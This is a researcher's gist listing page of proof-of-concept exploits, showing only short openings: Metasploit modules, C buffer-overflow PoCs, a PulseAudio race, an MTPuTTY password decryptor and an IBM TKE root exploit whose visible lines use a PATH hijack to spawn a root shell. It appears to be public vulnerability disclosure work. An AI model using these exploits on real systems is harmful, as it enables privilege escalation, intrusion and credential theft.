Yorick Koster ykoster
ykoster / ms12_025_dotnet_encoderparameter.rb
Created Oct 7, 2019
.NET Framework EncoderParameter integer overflow vulnerability - proof of concept
##
# run 'rundll32 dfshim CleanOnlineAppCache' to clear ClickOnce cache
##
require 'msf/core'
require 'base64'
require 'digest/sha1'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
ykoster / EMFexp.c
Created Oct 7, 2019
Enhanced Meta File arbitrary memory access vulnerability - proof of concept
/* -----------------------------------------------------------------------------
* Enhanced Meta File arbitrary memory access vulnerability
* Revision 0.1, Yorick Koster, November 5th, 2004
* -----------------------------------------------------------------------------
* Summary:
* ---------
* A memory access flaw has been discovered in the
* GetEnhMetaFilePaletteEntries() [1] function. This flaw can be used to crash
* programs that call this function. Furthermore, it is also possible to copy
* arbitrary parts of memory into a buffer that is passed to the
ykoster / EudoraBoF.c
Created Oct 7, 2019
Eudora 5.2.1 buffer overflow through overly long attachment filename - proof of concept
/*
* Summary : Eudora 5.2.1 has a remotely exploitable buffer overflow
* This vulnerability can be exploited by spoofing an attachment
* that has an overly long filename. An overly long filename will
* cause ECX to be overwritten; this value is later used in EIP,
* thus allowing the execution of arbitrary code.
* Note that the filename must begin with a backslash character
* in order to trigger the buffer overflow. Dot characters are
* not needed, but will trigger the buffer overflow sooner
*
ykoster / parse_srv.c.diff
Created Oct 7, 2019
MS04-037: Vulnerability in Windows Shell Could Allow Remote Code Execution - proof of concept
--- download/samba-3.0.2a/source/rpc_parse/parse_srv.c.O Fri May 21 21:18:14 2004
+++ download/samba-3.0.2a/source/rpc_parse/parse_srv.c Sat Jun 12 18:26:37 2004
@@ -28,6 +28,450 @@
#undef DBGC_CLASS
#define DBGC_CLASS DBGC_RPC_PARSE
+/*
+ * Exploit code for "Microsoft's Explorer and Internet Explorer long
+ * share name buffer overflow" discovered by Rodrigo Gutierrez.
+ * $rev 1.5, Yorick Koster, June 12, 2004
ykoster / pa_race.sh
Created Oct 1, 2019
PulseAudio local race condition privilege escalation vulnerability - proof of concept (https://www.akitasecurity.nl/advisory/AK20090602/pulseaudio_local_race_privilege_escalation_vulnerability.html)
#!/bin/bash
pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`
trap cleanup INT
ykoster / evolution_tnef_plugin_multil.rb
Created Oct 1, 2019
yTNEF/Evolution TNEF Attachment decoder plugin directory traversal & buffer overflow vulnerabilities - proof of concept (https://www.akitasecurity.nl/advisory/AK20090601/ytnef_evolution_tnef_plugin_traversal___overflow_vulnerabilities.html)
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMTPDeliver
def initialize(info = {})
super(update_info(info,
'Name' => 'Evolution TNEF Attachment decoder plugin directory traversal and buffer overflow vulnerabilities',
'Description' => %q{
ykoster / Invoke-MTPuTTYConfigDump.psm1
Last active Sep 23, 2019
Invoke-MTPuTTYConfigDump - read an MTPuTTY configuration file, decrypt the passwords and dump the result
<#
.Synopsis
Decrypt an MTPuTTY configuration file
.Description
Read an MTPuTTY configuration file, decrypt the passwords and dump the result
.Parameter ConfigFile
Path to the MTPuTTY configuration file
ykoster / mordan.c
Created Jun 4, 2019
Mordan is a program that can be used to determine the internal state of the java.util.Random() random number generator
/* ---------------------------------------------------------------------
* mordan.c
* revision 0.4
* ---------------------------------------------------------------------
* November 2005, Yorick Koster, ITsec Security Services
* ---------------------------------------------------------------------
* Mordan is a program that can be used to determine the internal state
* of the java.util.Random() random number generator. In order to do so,
* mordan requires two integer values (created with Random.nextInt())
* or one long value (created with Random.nextLong()).
ykoster / gotroot.sh
Created Mar 31, 2019
IBM Trusted Key Entry (TKE) workstation local privilege escalation
#!/bin/bash
OLDPATH=$PATH
trap cleanup EXIT
export PATH=.:$PATH
/bin/cat > $HOME/iptables << __EOF
#!/bin/bash
/bin/su -c /usr/bin/xterm
__EOF
ykoster / SonosController.ps1
Last active Apr 3, 2019
Sonos Controller for Windows ShareConfig.xml weak file permissions
# load System.Security for HMAC-SHA256
Add-Type -AssemblyName System.Security
$ip = "127.0.0.1"
$port = 3445
$configPath = "$env:ProgramData\Sonos,_Inc\runtime\ShareConfig.xml"
$sharePath = "$env:windir\media"
# the entropy value is hardcoded in the service and used for encrypting and decrypting the password of the Sonos user (DPAPI)
$entropy = [System.Text.Encoding]::Unicode.GetBytes("e51bd1fb-2783-4261-95b8-027afc69e8af");